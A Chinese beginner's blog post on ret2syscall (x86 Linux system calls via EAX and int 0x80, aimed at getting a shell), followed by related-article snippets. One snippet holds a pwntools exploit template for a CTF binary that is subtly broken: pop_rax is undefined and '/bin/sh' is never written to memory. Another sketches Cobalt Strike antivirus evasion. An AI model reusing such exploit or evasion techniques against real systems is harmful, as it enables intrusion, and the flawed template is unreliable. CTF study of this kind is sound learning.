ret2syscall前置知识

最新推荐文章于 2025-04-03 19:20:12 发布
原创 最新推荐文章于 2025-04-03 19:20:12 发布 · 2.8k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #pwn

本文旨在为新手介绍如何在Linux环境下通过x86架构触发系统调用来执行高权限操作。系统调用是用户程序与操作系统内核交互的桥梁,允许程序访问受限服务。在x86系统中,通过将系统调用号存入EAX寄存器,函数参数存入其他通用寄存器,然后触发0x80中断(int0x80)来实现。这篇博客适合对系统调用感兴趣的初学者,旨在共同学习进步。

1.目的

是拿到shell

2.具体操作

控制程序执行系统调用(字面理解就可)

3.系统调用是什么?

系统调用:system call

按照搜索的定义可理解为一种服务:程序运行在用户空间向操作系统内核(内核空间)请求更高权限运行

用户空间和内核空间可参考以下百度

用户空间_百度百科 (baidu.com)

系统调用提供用户程序与操作系统间的接口(大多数系统交互式操作系统需要在内核态执行)

系统调用就运行在内核空间

4.具体怎么做

linux在x86系统

触发int 0x80 ,借助系统调用号

应用程序调用系统调用的过程是:

  1. 把系统调用的编号存入 EAX;
  2. 把函数参数存入其它通用寄存器;
  3. 触发 0x80 号中断(int 0x80)

个人觉得以上内容较适合新手小白,因为就是一个小白的理解,希望大佬们多多包涵.

希望与更多师傅们交流,共同学习进步. 

Rt1Text
关注
PWN基础-ROP技术-ret2syscall-64程序栈溢出利用
Welcome To Myon'Blog !
05-08 713
后面传两个参数就可以了,分开写,一起写都可以的,这里就不做过多演示了。前置 ret2syscall 的基础我们就不做过多讲解了。execve 系统调用号是 59,也就是 0x3b。ida 看一下 main 函数,存在明显的栈溢出。看到有两个连一起的,当然我们也可以一个一个地传参。而 64 系统调用最后是执行 syscall。32 系统调用最后是执行 int x080。我们这里只用到前三个就可以了,以及 rax。这里看到的这个不对,因为后面没有 ret。正确的应该是 0x45BAC5。
pwn学习笔记(9)-中级ROP--ret2csu
qq_66013948的博客
08-09 594
​ 首先是64文件的传参方式:前六个参数是从左到右放入寄存器:rdi、rsi、rdx、rcx、r8、r9,之后的通过栈传参。​ 比如:传参函数大于7个:h->(%esp)g->(%esp)call H​ 之后反汇编一下main函数和H函数的代码​ 很明显的就是前六个参数是寄存器传参,剩下两个就是栈传参。
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3980
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
ret2syscall
m0_62280492的博客
07-16 1052
介绍pwn中32系统和64系统下的ret2syscall
Ret2syscall(超详细)
m0_68956519的博客
03-23 1284
(System Call)是操作系统提供给应用程序的接口,允许应用程序请求操作系统内核执行某些特权操作。由于操作系统内核运行在更高的特权级别(如x86架构中的),普通应用程序(运行在)无法直接访问硬件资源或执行某些敏感操作(如文件读写、进程管理、网络通信等)。因此,应用程序需要通过系统调用来请求内核完成这些操作。我用自己的话说就是设置对应寄存器的值,达到调用系统函数的过程下面是对应的系统调用表Linux X86架构 32 64系统调用表_32 syscall-优快云博客。
ret2syscall简单总结
ULGANOY的博客
07-05 1664
主要是自己的简单的学习总结。
pwn基本ROP——ret2syscall
turtlesd的博客
04-25 3025
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。 应用程序调用系统调用的过程是: 1、把系统调用的编号存入 EAX; 1、把函数参数存入其它通用寄存器; 3、触发 0x80
xv6-lab2-syscall
qq_25698501的博客
10-26 4311
Lab: system calls(HITSZ) 前置知识 阅读xv6 book 章节2、4.3、4.4 熟悉系统调用用户空间代码 user/user.h 和 user/usus.pl 熟悉系统调用内核空间代码 kernel/syscall.h 和 kernel/syscall.c 熟悉进程相关代码 kernel/proc.h 和 kernel/proc.c System call tracing 实验目标 实现一个系统调用 trace(uint64 mask) 若mask的二进制表示中第n为1
蓝牙音频开发前置准备:A2DP Sink_Source环境搭建与Codec配置全解析
A2DP(Advanced Audio Distribution Profile)作为蓝牙音频传输的核心协议,定义了高质量单向音频流从源设备(Source)到接收设备(Sink)的传输机制。其底层依赖于AVDTP(Audio/Video Distribution Transport ...
Cobalt Strike CS2 Beacon免杀技术分析
syg6921008的博客
04-03 2231
Cobalt Strike 2/4.x (CS2) 是当前红队演练和APT模拟中最常用的控制框架。由于它的 Beacon payload 默认给出的可执行文件、加载器和 shellcode 均已被大量杀毒软件加入特征并纵向检测,因此,Beacon 免杀处理是正常使用的必须技术前缀。免杀技术分为静态免杀,动态免杀,行为干扰免杀,内存免杀和正常行为防护等方面,以下进行精细分类。利用 VirtualAlloc / VirtualProtect 创建可执行内存段自定义 shellcode 解密流程。
ret2syscallpwn第二课)
s5555555___的博客
02-20 2103
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 3855
虽然网上(包括优快云)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
字符串溢出(pwn溢出)--ret2syscall
莫慌的博客
09-29 978
pwn入门
ret2syscall 原理与实践
m0_57836225的博客
12-12 985
在 CTF(夺旗赛)的 PWN(二进制漏洞利用)挑战中,ret2syscall 是一种经典且重要的利用技巧,用于获取目标系统的控制权。掌握 ret2syscall 对于深入理解二进制漏洞利用和提升 PWN 解题能力具有关键意义。在操作系统中,系统调用是用户程序与操作系统内核之间的接口。用户程序通过执行特定的指令(如在 x86 架构下的 int 0x80 或 syscall 指令),并传递相应的参数,来请求内核执行特定的功能,如文件操作、进程管理等。
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
m0_67266787的博客
03-15 1361
文章目录 What is ret2syscall pwn题思路 例题 保护机制 写payload 打开flag 读取flag 写到输出中 生成shellcode 开始做题 调用read(0,mem,0x1000)把我们真正的shellcode写道mem 调试是否可以往mem写shellcode 往mem填写读取flag的shellcode 总结 What is ret2syscall ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到s
RET2syscall
T_Fire_of_Square的博客
12-18 454
基本rop之一,意为call system,控制程序执行系统调用,获取shell。
ret2syscall 64
最新发布
11-12
ret2syscall是一种ROP(Return Oriented Programming)技术,用于在64程序栈溢出利用中执行系统调用。其核心思路是通过构造栈上的数据,控制程序的执行流程,将寄存器设置为系统调用所需的参数,然后触发系统调用以执行特定操作,如执行shell等。 在64系统中,常见的系统调用需要设置的寄存器及其作用如下: - `rax`:存储系统调用号。 - `rdi`:第一个参数。 - `rsi`:第二个参数。 - `rdx`:第三个参数。 为了实现ret2syscall,需要找到合适的gadget(小的代码片段)来控制寄存器的值。可以使用工具如`ROPgadget`来查找这些gadget。例如,为了设置`rdi`、`rsi`和`rdx`寄存器,可以使用以下命令来查找相应的`pop`指令gadget: ```bash ROPgadget --binary ret2sys_64 --only "pop|ret" | grep "pop rdi ; ret" ROPgadget --binary ret2sys_64 --only "pop|ret" | grep "pop rsi ; ret" ROPgadget --binary ret2sys_64 --only "pop|ret" | grep "pop rdx ; ret" ``` 以下是一个简单的伪代码示例,展示了如何构造一个ret2syscall的payload: ```python from pwn import * # 加载目标二进制文件 elf = ELF('ret2sys_64') # 查找gadget pop_rdi = 0xdeadbeef # 替换为实际的pop rdi; ret地址 pop_rsi = 0xcafebabe # 替换为实际的pop rsi; ret地址 pop_rdx = 0x13371337 # 替换为实际的pop rdx; ret地址 syscall = 0xfeedfeed # 替换为实际的syscall地址 # 系统调用号(例如,execve为59) syscall_num = 59 # 要执行的命令(例如,/bin/sh) cmd = "/bin/sh\x00" cmd_addr = elf.bss() + 0x100 # 在bss段找一个地址存放命令 # 构造payload payload = b'A' * offset # offset为溢出所需的填充字节数 payload += p64(pop_rdi) payload += p64(cmd_addr) payload += p64(pop_rsi) payload += p64(0) payload += p64(pop_rdx) payload += p64(0) payload += p64(pop_rax) payload += p64(syscall_num) payload += p64(syscall) # 发送payload p = process('ret2sys_64') p.sendline(payload) p.interactive() ``` 在实际应用中,需要根据具体的二进制文件和环境进行调整。同时,还需要注意ASLR(地址空间布局随机化)等防护机制的影响。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值